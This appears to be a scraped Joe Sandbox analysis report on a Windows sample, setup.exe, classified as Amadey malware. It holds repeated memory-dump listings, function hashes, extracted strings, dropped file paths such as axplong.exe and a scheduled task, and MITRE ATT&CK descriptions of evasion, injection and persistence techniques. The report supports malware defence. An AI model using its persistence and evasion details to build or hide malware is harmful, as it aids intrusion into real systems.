Associated: 00000001.00000002.4114156950.0000000001062000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4114222559.0000000001069000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4114242252.000000000106B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4114242252.00000000011F7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4114242252.00000000012DD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4114242252.000000000130C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4114242252.0000000001315000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4114242252.0000000001324000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4114546321.0000000001325000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4114662859.00000000014CC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4114682556.00000000014CE000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1000000_axplong.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction ID: 152abe16c5e535ec85434659869c8dab46cd9448f0ace41444df38e7d3bc4ce8
Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction Fuzzy Hash: 5D110BF720004183F684C6ADD8F85BA9FD5FBC522072CCBF7D2C14BB54D222D1659500

Function 0103643B Relevance: .0, Instructions: 24COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4114156950.0000000001001000.00000040.00000001.01000000.00000007.sdmp, Offset: 01000000, based on PE: true

Associated: 00000001.00000002.4114137774.0000000001000000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4114156950.0000000001062000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4114222559.0000000001069000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4114242252.000000000106B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4114242252.00000000011F7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4114242252.00000000012DD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4114242252.000000000130C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4114242252.0000000001315000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4114242252.0000000001324000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4114546321.0000000001325000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4114662859.00000000014CC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4114682556.00000000014CE000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1000000_axplong.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 38ac151e90e2919427b0fec7e7c69f58d31ea096eb714bea92998accb839b4fa
Instruction ID: c343f697702cc6db59efb8e0083644b43b039967a3356b7a055446bd11b514b1
Opcode Fuzzy Hash: 38ac151e90e2919427b0fec7e7c69f58d31ea096eb714bea92998accb839b4fa
Instruction Fuzzy Hash: 39E08630641608BFDF36BB18C80CE887BEEEF92150F505404E89846131CF66DA82D640

Function 0103A1A2 Relevance: .0, Instructions: 22COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4114156950.0000000001001000.00000040.00000001.01000000.00000007.sdmp, Offset: 01000000, based on PE: true

Associated: 00000001.00000002.4114137774.0000000001000000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4114156950.0000000001062000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4114222559.0000000001069000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4114242252.000000000106B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4114242252.00000000011F7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4114242252.00000000012DD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4114242252.000000000130C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4114242252.0000000001315000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4114242252.0000000001324000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4114546321.0000000001325000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4114662859.00000000014CC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4114682556.00000000014CE000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1000000_axplong.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e6d3f81bf9612d8360929edb31d8ce1375adbaa32f41a7c69d112e79a3c508fb
Instruction ID: 7299e96b405fa2b808d56e12b94635ecf498fa12dbe5949f66dd3d89e48c5a9f
Opcode Fuzzy Hash: e6d3f81bf9612d8360929edb31d8ce1375adbaa32f41a7c69d112e79a3c508fb
Instruction Fuzzy Hash: 70E0EC72A55228EBCB25DB9CC94498AF7ECEB89A55B5544A6BA41D3250C270DE00C7D0

Function 01012DF0 Relevance: 17.9, APIs: 3, Strings: 7, Instructions: 434COMMON

Download Yara Rule

Strings

246122658369, xrefs: 010133A4
invalid stoi argument, xrefs: 0101422A
stoi argument out of range, xrefs: 01012DF0, 01014239
9wGTaHilQw==, xrefs: 01012E97
Xst=, xrefs: 0101338A
Gl==, xrefs: 0101366E
Inhk, xrefs: 0101375F

Memory Dump Source

Source File: 00000001.00000002.4114156950.0000000001001000.00000040.00000001.01000000.00000007.sdmp, Offset: 01000000, based on PE: true

Associated: 00000001.00000002.4114137774.0000000001000000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4114156950.0000000001062000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4114222559.0000000001069000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4114242252.000000000106B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4114242252.00000000011F7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4114242252.00000000012DD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4114242252.000000000130C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4114242252.0000000001315000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4114242252.0000000001324000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4114546321.0000000001325000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4114662859.00000000014CC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4114682556.00000000014CE000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1000000_axplong.jbxd

Yara matches

Similarity

API ID:
String ID: 246122658369$9wGTaHilQw==$Gl==$Inhk$Xst=$invalid stoi argument$stoi argument out of range
API String ID: 0-301961687
Opcode ID: 380160dea48600edfe3aec0b314eb41d127fff95ebd1669e0b996112ccd66564
Instruction ID: 96d5e6bd82ed7c476b3f0946c88b33e2753fa42c32b6bcdd6b63ac0370b917f3
Opcode Fuzzy Hash: 380160dea48600edfe3aec0b314eb41d127fff95ebd1669e0b996112ccd66564
Instruction Fuzzy Hash: 1902F170A00249EFEF15EFA8C844BDEBFB5BF14314F504198E885AB285D7799A84CF91

Function 010370A9 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 74COMMON

Download Yara Rule

APIs

_wcsrchr.LIBVCRUNTIME ref: 010370EB

Strings

.exe, xrefs: 010370F8
.com, xrefs: 0103712B
.cmd, xrefs: 01037109
.bat, xrefs: 0103711A

Memory Dump Source

Source File: 00000001.00000002.4114156950.0000000001001000.00000040.00000001.01000000.00000007.sdmp, Offset: 01000000, based on PE: true

Associated: 00000001.00000002.4114137774.0000000001000000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4114156950.0000000001062000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4114222559.0000000001069000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4114242252.000000000106B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4114242252.00000000011F7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4114242252.00000000012DD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4114242252.000000000130C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4114242252.0000000001315000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4114242252.0000000001324000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4114546321.0000000001325000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4114662859.00000000014CC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4114682556.00000000014CE000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1000000_axplong.jbxd

Yara matches

Similarity

API ID: _wcsrchr
String ID: .bat$.cmd$.com$.exe
API String ID: 1752292252-4019086052
Opcode ID: 56ebc9a41148741bddc49b6f5c2657cf5f9163ae2d4df2f0e4b50a8d55a60b63
Instruction ID: bda98d4f05a174a247cb131aab52b238ee87456fad6ff52597a9eda928a10d59
Opcode Fuzzy Hash: 56ebc9a41148741bddc49b6f5c2657cf5f9163ae2d4df2f0e4b50a8d55a60b63
Instruction Fuzzy Hash: AF01C47BB04616653655605D9C01677BBDD8FE2AB4B2A006EFDC4FB2C2EE54D80251A0

Function 01002DC0 Relevance: 7.8, APIs: 5, Instructions: 272COMMON

Download Yara Rule

APIs

__Mtx_unlock.LIBCPMT ref: 01002E5F
__Mtx_unlock.LIBCPMT ref: 01002ECC
__Cnd_broadcast.LIBCPMT ref: 01002EE3
__Mtx_unlock.LIBCPMT ref: 01002FF5
__Mtx_unlock.LIBCPMT ref: 0100309B

Memory Dump Source

Source File: 00000001.00000002.4114156950.0000000001001000.00000040.00000001.01000000.00000007.sdmp, Offset: 01000000, based on PE: true

Associated: 00000001.00000002.4114137774.0000000001000000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4114156950.0000000001062000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4114222559.0000000001069000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4114242252.000000000106B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4114242252.00000000011F7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4114242252.00000000012DD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4114242252.000000000130C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4114242252.0000000001315000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4114242252.0000000001324000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4114546321.0000000001325000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4114662859.00000000014CC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4114682556.00000000014CE000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1000000_axplong.jbxd

Yara matches

Similarity

API ID: Mtx_unlock$Cnd_broadcast
String ID:
API String ID: 32384418-0
Opcode ID: 90c835f932023d1c8eb1b906ca5b1da7f74a203f7f94572bacdccb3f16b312c1
Instruction ID: 58d85cb037226518b5becf24932c871a2198c198d2087aa0244b14bf5401ac3f
Opcode Fuzzy Hash: 90c835f932023d1c8eb1b906ca5b1da7f74a203f7f94572bacdccb3f16b312c1
Instruction Fuzzy Hash: 40A1F3709412169FFB12DF68C948BAABBE8FF15354F0442B9E895DB281EB34E504CBD1

Function 0103C990 Relevance: 6.3, APIs: 4, Instructions: 320COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 0103CA17

Memory Dump Source

Source File: 00000001.00000002.4114156950.0000000001001000.00000040.00000001.01000000.00000007.sdmp, Offset: 01000000, based on PE: true

Associated: 00000001.00000002.4114137774.0000000001000000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4114156950.0000000001062000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4114222559.0000000001069000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4114242252.000000000106B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4114242252.00000000011F7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4114242252.00000000012DD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4114242252.000000000130C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4114242252.0000000001315000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4114242252.0000000001324000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4114546321.0000000001325000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4114662859.00000000014CC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4114682556.00000000014CE000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1000000_axplong.jbxd

Yara matches

Similarity

API ID: _strrchr
String ID:
API String ID: 3213747228-0
Opcode ID: 06cc7c729825ef3726f3ff46e89b4dfb23933aad1dd17f016a943cdb57bb7414
Instruction ID: fdd444a39991a8117033d745da7006f76b790534f3686c07a47cb7934b13ad0e
Opcode Fuzzy Hash: 06cc7c729825ef3726f3ff46e89b4dfb23933aad1dd17f016a943cdb57bb7414
Instruction Fuzzy Hash: A8B1257290068A9FEB15CF68C9807EEBBE9EF95340F1481ABD5C5FB241D6349902CB60

Function 0101BA72 Relevance: 6.1, APIs: 4, Instructions: 80COMMON

Download Yara Rule

APIs

_xtime_get.LIBCPMT ref: 0101BACA
__Xtime_diff_to_millis2.LIBCPMT ref: 0101BAE4
_xtime_get.LIBCPMT ref: 0101BB07
__Xtime_diff_to_millis2.LIBCPMT ref: 0101BB13

Memory Dump Source

Source File: 00000001.00000002.4114156950.0000000001001000.00000040.00000001.01000000.00000007.sdmp, Offset: 01000000, based on PE: true

Associated: 00000001.00000002.4114137774.0000000001000000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4114156950.0000000001062000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4114222559.0000000001069000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4114242252.000000000106B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4114242252.00000000011F7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4114242252.00000000012DD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4114242252.000000000130C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4114242252.0000000001315000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4114242252.0000000001324000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4114546321.0000000001325000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4114662859.00000000014CC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4114682556.00000000014CE000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1000000_axplong.jbxd

Yara matches

Similarity

API ID: Xtime_diff_to_millis2_xtime_get
String ID:
API String ID: 531285432-0
Opcode ID: 0a528b4493ffe1a6f9b465aa67e2280d18e758b83f6e9f0827bae65ef4e306f3
Instruction ID: dd707352bb8c37911a7eae19039c1e82f74d663c060617cfefc841ccc5c8f2aa
Opcode Fuzzy Hash: 0a528b4493ffe1a6f9b465aa67e2280d18e758b83f6e9f0827bae65ef4e306f3
Instruction Fuzzy Hash: F2215E71A4021AAFEF10EFA8C9819FEB7B8EF58714F500059F941A7254DB79AD018BA0

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report setup.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Amadey

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe:Zone.Identifier

C:\Windows\Tasks\axplong.job

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Possible Origin

Network Behavior

Snort IDS Alerts

Network Port Distribution

Windows Analysis Report
setup.exe

Function 0100BD30 Relevance: 19.6, APIs: 5, Strings: 6, Instructions: 310
networkfileCOMMON

Function 01005DD0 Relevance: 12.6, APIs: 2, Strings: 5, Instructions: 364
COMMON

Function 01007CE0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 392
COMMON

Function 01036DE1 Relevance: 4.6, APIs: 3, Instructions: 145
COMMON

Function 0103D4D4 Relevance: 1.7, APIs: 1, Instructions: 198
COMMONLIBRARYCODE

Function 01008290 Relevance: 1.7, APIs: 1, Instructions: 159
COMMON

Function 01036C79 Relevance: 1.6, APIs: 1, Instructions: 89
COMMON

Function 01036F51 Relevance: 1.6, APIs: 1, Instructions: 56
timeCOMMON

Function 0103D6CF Relevance: 1.5, APIs: 1, Instructions: 40
memoryCOMMON

Function 01016AB0 Relevance: 1.3, APIs: 1, Instructions: 40
sleepCOMMON